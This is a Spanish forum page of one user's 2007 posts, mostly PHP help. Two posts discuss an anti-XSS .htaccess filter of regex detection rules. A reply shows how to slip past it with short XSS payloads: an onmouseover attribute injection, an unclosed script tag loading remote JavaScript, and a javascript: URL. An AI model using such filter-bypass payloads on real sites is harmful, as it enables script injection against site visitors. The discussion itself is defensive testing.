elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Seguridad Informática / Hacking / Re: Código PHP AntiXSS en: 4 Agosto 2007, 03:10 am
Cita de: 19.5 en  4 Agosto 2007, 02:43 am
Repito, propongo estudiar la función anterior por si hubiera alguna falla. Y para las/los osadas/dos publicar alguna función que pretenda superar aquella. O la que publique en un principio ;D

Totalmente de acuerdo...
12  Programación / PHP / Re: Como subir mi base de datos en: 3 Agosto 2007, 02:59 am
Para exportar has como dice RedMX.

[How To] Mover una base de datos
http://foro.elhacker.net/index.php/topic,172686.0.html

Suerte,  ;)
13  Programación / PHP / Re: Mejor amnera de programar en php en: 31 Julio 2007, 23:39 pm
Mi modesta opinión,

Para dominar cualquier lenguaje de programación, nosotros nunca nacemos sabiendo, por lo que debemos consultar, manuales, tutoriales, etc.

Estos nunca van a ser perfecto, pero por ejemplo, si eres nuevo, tienes que buscar alguno, o, algún tipo de información básica sobre PHP, una vez que ya domines las cosas básicas, te vas orientando tu mismo, de la manera que vayas resolviendo tus dudas y te vayas aclarando en la materia.

Es como todo, debes hacer ejercisios para que le puedas cojer la "vuelta", puedes tu mismo marcarte un reto, de crear una aplicacion web, no hablo de blogs, foros, o cualquier aplicacion de esta, que ya no se pudieran crear uno solo, sino, pequenos scipts, que tu creas que puedas lograr, o algun tipo de ejercisio, que te pudiera ayudar a aumentar tus conocimientos.

Si tienes una duda, preguntando en foros, consultando la web de php.net, etc, vas a lograr dominar este lenguaje.

Suerte,  ;)
14  Programación / PHP / Re: captcha en php en: 31 Julio 2007, 23:08 pm
Bueno aquí varios links.

Captcha Gratuito y externo
http://foro.elhacker.net/index.php/topic,172975.0.html

ReCaptcha
http://recaptcha.net/

Todos estos son adaptables

Suerte,  ;)
15  Programación / PHP / Re: Contador de click en PHP en: 31 Julio 2007, 22:11 pm
Evidentemente es ASP, pero en PHP, no te va a llevar mas de 10 lineas de código  :xD .

Aquí una ayuda, crea un archivo de texto, y ponle contador.txt, dale permisos de escritura.

Y nuestro archivo donde quieres capturar los clicks
Código
  1. <?php
  2. $filename = "contador.txt"; // Planteamos el nombre del archivo
  3. $fd = fopen ($filename, "r"); // Lo abrimos en modo lectura
  4. $contents = fread ($fd, filesize($filename)); // Leemos
  5. fclose ($fd); // Cerramos
  6. $contents=$contents+1; // Incrementamos el valor por uno
  7. echo $contents; // los mostramos
  8. $fp = fopen ($filename, "w"); // Ahora en modo escritura
  9. fwrite ($fp,$contents); // Escribimos el nuevo valor
  10. fclose ($fp); // Cerramos
  11. ?>

Esta funcion es facil, lo que hace es lee el contador del archivo, si el numero es X se le suma uno....

En fin, un simple contador en PHP.

P.D- El Tema va en el subforo de PHP
16  Seguridad Informática / Hacking / Re: Código PHP AntiXSS en: 31 Julio 2007, 03:37 am
Cita de: yeikos en 30 Julio 2007, 10:46 am
born2kill, cambia tu forma de pensar a no tengo que cometer esos fallos...

Haber, estamos analizando, como parar ataques XSS, o prevenirnos de ellos, esta claro que no se deben cometer esos fallos, pero estar prevenidos no viene mal.

Mi forma de pensar?...  :xD

Cita de: Sirdarckcat en 30 Julio 2007, 23:02 pm
born2kill:
Código:
(\"|%22).*(\>|%3E|<|%3C).*
supongo que es para prevenir attribute splitting, como en:
Código
  1. <?php
  2. echo "<a href=\"{$_GET['entrada']}\">Link</a>";
  3. ?>
  4.  
se puede saltar simplemente no cerrando el atributo
?a=" onmouseover="alert(/xss/.source)"
Código:
(\<|%3C).*script.*(\>|%3E)
se salta, igual no cerrando <script.. asi:
Código:
<script src=//sirdarckcat.net/cache_poisoning.js x
Código:
(javascript:).*(\;).*
no pones el ; al final..
Código
  1. javascript:alert("pwned")
Código:
(,|;|<|>|'|`)
la coma la puedes no usar llamando funciones desde funcion.apply, los ; puedes no usarlos, los "<" y ">" si los quitas, entonces para que son las primeras 2 reglas? XD, y las comillas, para ataques de XSS no son necesarias, puedes usar /texto/.source
Saludos!!

Mhh.... Me dejaste pensando, bueno evidentemente solamente podriamos para ataques básico, tengo que encontrar alguna forma de mejorarlo.


La lista que publicaste esta bien interesante.
17  Seguridad Informática / Hacking / Re: Código PHP AntiXSS en: 30 Julio 2007, 06:23 am
jajja, esta muy bien el codigo....no te parece mejor un .htaccess  :xD .... Lo que se te va a hacer un mundo cargando la web  :xD

Si alguien logra vulneral esto  :D

.htaccess

Código:
Options +FollowSymLinks
RewriteEngine On
RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} (javascript:).*(\;).* [NC]
RewriteRule ^(.*)$ index.php [NC]
RewriteCond %{QUERY_STRING} 
RewriteRule ^(.*)$ index.php [NC]
RewriteRule (,|;|<|>|'|`) /index.php [NC]

18  Programación / PHP / Re: [Ayuda]Multi-Foros Leer... en: 25 Julio 2007, 23:25 pm
Ps, yo no veo nada, me tira error......no obstante no se porque te tira ese error a ti.
19  Programación / PHP / Re: [Ayuda]Multi-Foros Leer... en: 25 Julio 2007, 23:01 pm
Dejame ver...Instalaste un una instalacion limpia de smf no?, le instalaste el mod?.
20  Programación / PHP / Re: [Ayuda]Multi-Foros Leer... en: 25 Julio 2007, 05:14 am
 :xD . De veras que no lo entiendes, para instalar ese que te di, necesitas una instalacion de un foro SMF 1.1.3 , ya correctamente instalado, una vez que lo tengas instalado le instalas el MOD que te puse (El link) y te debe funcionar.

Saludos
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines